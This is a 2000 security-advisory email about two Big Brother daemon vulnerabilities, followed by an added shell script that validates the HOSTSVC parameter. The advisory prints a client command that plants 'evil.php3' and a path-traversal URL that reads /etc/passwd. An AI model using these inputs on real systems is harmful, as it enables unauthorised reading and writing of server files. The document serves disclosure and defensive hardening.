Subject: [NEWS] Two new Big Brother vulnerabilities
Date: Fri, 14 Jul 2000 21:33:00 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Two new Big Brother vulnerabilities
--------------------------------------------------------------------------------

SUMMARY

The Big Brother daemon listens for incoming connections on port 1984. Two separate security holes allow remote attackers to read and write arbitrary files on the system, entirely compromising the server's security.

DETAILS

Vulnerable systems:
Big Brother 1.4h2 (only writing files)
Big Brother version 1.4h (both vulnerabilities)

Immune systems:
Big Brother version 1.4h2 (immune against reading arbitrary files)

First Vulnerability:
The following command:

$ ./bb 1.2.3.4 "status evil.php3 "

(NOTE: The bb program is the Big Brother client)

Will show the /etc/passwd upon browsing to:
http://1.2.3.4/bb/logs/evil.php3

Second Vulnerability:
The second problem exists in the code where $HOSTSVC does not do authenticity checking for its assigned variable.

---- snip ----
# get the color of the status from the status file
set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1
BKG="$1"
---- snap ----

Example:
The following URL:
http://www.bb4.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd

Will retrieve the /etc/passwd file.

ADDITIONAL INFORMATION

The information has been provided by xternal and Eric Hines.

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
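
For the second vulnerability described above, the following added example (not part of the advisory and not Big Brother's own code) shows one way a CGI shell script can validate HOSTSVC before joining it to $BBLOGS. The function names, the character allowlist and the sample status file name are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: allowlist check for a HOSTSVC-style parameter.
# Assumption: legitimate status file names contain only letters,
# digits, ',', '.', '_' and '-'.

valid_hostsvc() {
    name=$1
    [ -n "$name" ] || return 1              # empty value
    [ "${#name}" -le 255 ] || return 1      # longer than a file name can be
    case $name in
        */*)                return 1 ;;     # any path separator
        *..*)               return 1 ;;     # parent-directory component
        .*)                 return 1 ;;     # ".", hidden files
        *[!A-Za-z0-9,._-]*) return 1 ;;     # anything outside the allowlist
    esac
    return 0
}

# Hypothetical replacement for the `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` step:
# prints the first line of the status file, or fails closed.
# Return codes: 2 = rejected name, 3 = not a regular file in the logs directory.
status_first_line() {
    logs_dir=$1
    hostsvc=$2
    valid_hostsvc "$hostsvc" || return 2
    file=$logs_dir/$hostsvc
    # Regular file only, and not a symlink that could lead out of logs_dir.
    [ -f "$file" ] && [ ! -L "$file" ] || return 3
    head -n 1 "$file"
}

# Constructed inputs: one plausible status file name and the value from
# the advisory's example URL.
for v in 'www,example,com.conn' '/../../../../../../../../etc/passwd'; do
    if valid_hostsvc "$v"; then echo "accept: $v"; else echo "reject: $v"; fi
done
```

Quoting "$file" everywhere also avoids the word splitting that the unquoted backtick expansion in the original snippet relies on.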